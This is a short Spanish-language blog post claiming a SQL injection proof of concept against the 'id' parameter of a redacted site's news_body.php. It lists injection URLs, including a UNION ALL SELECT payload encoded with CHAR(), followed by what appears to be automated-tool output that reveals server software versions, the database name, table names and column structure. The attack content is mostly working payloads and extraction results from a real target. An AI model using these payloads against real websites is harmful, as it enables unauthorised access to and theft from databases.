Posts Tagged ‘Webmedia’

Webmedia SQL Injection

julio 15, 2011

Esta aplicacion web presenta una vulnerabilidad de tipo SQL Injection.

Realizamos una PoC de esta vulnerabilidad.

http://www.xxxxxxxxxxx.com/news_body.php?id=99
http://www.xxxxxxxxxxx.com/news_body.php?id='99
http://www.xxxxxxxxxxx.com/news_body.php?id=18' AND 5946=5946
http://www.xxxxxxxxxxx.com/news_body.php?id=-5946'
UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR
(58,98,107,118,58),IFNULL(CAST(CHAR(100,87,84,70,98,77,78,84,105,97)
AS CHAR),CHAR(32)),CHAR(58,120,118,111,58)), NULL, NULL, NULL,
NULL# AND 'MNHP'='MNHP

Efectivamente, el parametro ‘id’ de tipo GET es vulnerable

Realizando el ataque se pueden obtener algunos datos importantes como:

web server operating system: Linux CentOS
web application technology: Apache 2.0.63, PHP 5.1.6
Motor Base de Datos: MySQL 5.0.11
El nombre de la base de datos: trxxxxxeme_com

y acceder a algunas tablas de la DB

[4 tables]
+-----------+
| xxxnds   |
| content   |
| xxxxxfeed |
| products |
+-----------+

Table: products
[5 columns]
+---------+---------------+
| Column | Type |
+---------+---------------+
| bag     | varchar(xxx) |
| brandID | int(11)       |
| name    | varchar(xxx) |
| price   | decimal(xx,2) |
| pxxxID  | int(xx)       |
+---------+---------------+

Anuncios